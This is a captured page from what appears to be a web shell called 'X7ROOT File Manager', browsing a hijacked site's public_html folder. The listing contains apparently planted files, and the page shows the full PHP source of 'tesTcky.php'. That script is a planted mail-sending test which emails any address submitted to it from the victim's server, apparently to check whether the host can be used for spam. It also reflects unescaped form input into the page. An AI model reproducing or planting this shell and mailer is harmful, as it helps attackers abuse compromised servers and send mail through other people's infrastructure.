X7ROOT File Manager
Current Path:
/home/gfecatvj/public_html
home
/
gfecatvj
/
public_html
/
📁
..
📄
.deep_check_3689993cc5274f6581baea5f6b9ad649.txt
(46 B)
📄
.ftpquota
(15 B)
📁
.git
📄
.htaccess
(233 B)
📄
.res
(57 B)
📄
.upload_test_5a7a29ab4102b6d6878323c044b59c8e.txt
(47 B)
📁
76473b7d
📄
error_log
(4.07 KB)
📁
g
📄
index.php
(295 B)
📄
lsl2.php
(908 B)
📁
portofolio
📁
r
📁
si
📁
sites
📄
tesTcky.php
(757 B)
📁
user
📁
vendor
📁
wp
📁
x
Editing: tesTcky.php
<?php error_reporting(0); echo '<b>F-Automatical v8 [Sending test].<b><br><br><form method="post"> <input type="text" placeholder="email" name="email" value="'.$_POST['email'].'"> <input type="text" placeholder="ID" name="orderid" value="'.$_POST['orderid'].'"> <input type="submit" value="Send"> </form> <br>'; if (!empty($_POST['email'])) { if (!empty($_POST['email']) && trim($_POST['orderid']) != '') { $rand = trim($_POST['orderid']); } else { $rand = rand(); } mail(trim($_POST['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")","F-Automatical v8 [Sending test]."); echo '<b>Send an report to ['.$_POST['email'].'] - ID: '.$rand.'</b>'; echo '<!-- <id>'.$rand.'</id> -->'; } ?>
Upload File
Create Folder